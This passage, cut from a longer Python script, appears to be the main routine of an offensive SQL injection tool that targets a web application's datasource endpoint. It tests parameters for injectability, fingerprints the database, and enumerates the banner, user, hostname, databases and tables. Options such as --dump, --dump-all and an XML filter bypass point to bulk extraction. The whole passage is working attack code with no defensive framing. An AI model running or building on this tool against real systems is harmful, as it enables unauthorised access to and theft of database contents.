complete.{C.RESET}\n") sys.exit(0) # -- Resolve datasource --------------------------------------------------- if not args.ds_id: if datasources: args.ds_id = datasources[0]["id"] info(f"using datasource: {C.BOLD}{args.ds_id}{C.RESET}") else: fail("no --ds-id and no datasources found") sys.exit(1) # -- Test injection ------------------------------------------------------- has_enum = any([args.banner, args.current_user, args.current_db, args.hostname, args.dbs, args.tables, args.columns, args.dump, args.dump_all, args.count, args.sql, args.test]) if has_enum or args.test: info(f"testing injection via {C.BOLD}{args.injection_point}{C.RESET}...") inj = test_injectable(base_url, session, args.ds_id, timeout=args.timeout) if inj: good(f"injectable via {C.BOLD}{inj}{C.RESET}") args.injection_point = inj else: fail("injection test failed") if args.test: sys.exit(1) if args.test and not any([args.banner, args.current_user, args.current_db, args.dbs, args.tables, args.columns, args.dump, args.dump_all, args.count, args.sql]): print(f"\n {C.GRAY}// injectable. use --banner, --tables, --dump to extract.{C.RESET}\n") sys.exit(0) # -- Fingerprint DB ------------------------------------------------------- db_type = "unknown" if has_enum and not args.sql: db_type = fingerprint_db(base_url, session, args.ds_id, args.injection_point, args.timeout) ip = args.injection_point xb = args.xml_bypass to = args.timeout # -- Enumeration ---------------------------------------------------------- if args.banner: enum_banner(base_url, session, args.ds_id, db_type, ip, xb, to) if args.current_user: enum_current_user(base_url, session, args.ds_id, db_type, ip, xb, to) if args.current_db: enum_current_db(base_url, session, args.ds_id, db_type, ip, xb, to) if args.hostname: enum_hostname(base_url, session, args.ds_id, db_type, ip, xb, to) if args.dbs: enum_dbs(base_url, session, args.ds_id, db_type, ip, xb, to) if args.tables: enum_tables(base_url, session, args.ds_id, db_type, ip, xb, to, target_db=args.target_db, datasources=datasources) if args.columns: if not args.target_table: fail("--columns requires -T